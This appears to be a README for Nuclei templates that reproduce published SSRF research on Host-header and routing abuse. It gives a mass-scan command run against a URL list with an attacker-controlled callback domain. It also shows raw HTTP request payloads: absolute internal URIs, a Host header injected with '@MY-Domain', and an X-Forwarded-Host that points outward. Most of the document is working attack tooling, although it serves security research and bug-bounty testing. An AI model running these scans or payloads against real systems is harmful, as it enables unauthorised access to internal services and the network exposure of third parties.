Nuclei Templates to reproduce Cracking the lens's Research

Requirements

1 - Read and Watch !

Cracking the lens's Research

2 - Install Nuclei

Nuclei

3 - Clone this Repository

Blind SSRF

Usage

sed -i -- 's/- "Your Match"/- "Match Response of Your Domain e.g. <title>Title My Server 0xAwali<\/title>"/' *.yaml

nuclei -c 300 -list url.txt -bulk-size 50 -retries 3 -timeout 20 -t "/Templates/*.yaml" -var "MY-DOMAIN=domain.com"

Keep in Your Mind

don't use {{interactsh-url}} because I noticed a lot of Interaction will take time to happen so You will miss a lot

Next Step !

if nuclei matched something , now You have completely SSRF

if nuclei didn't match anything but there is HTTP Interaction happen , now maybe You have Blind SSRF

so try to invest some time and use this blog as reference

A Glossary of Blind SSRF Chains

Results

1 - Completely SSRF

GET http://internal-domains.company.com/ HTTP/1.1
Host: company.com
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*

GET http://internal-domains.company.com/ HTTP/1.0
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*

2 - Blind SSRF but there isn't luck to hit internal services

GET / HTTP/1.1
Host: company.com @MY-Domain #did you notice that there is a space between company.com and @
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*

GET / HTTP/1.1
Host: company.com
X-Forwarded-Host: MY-Domain/.company.com
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*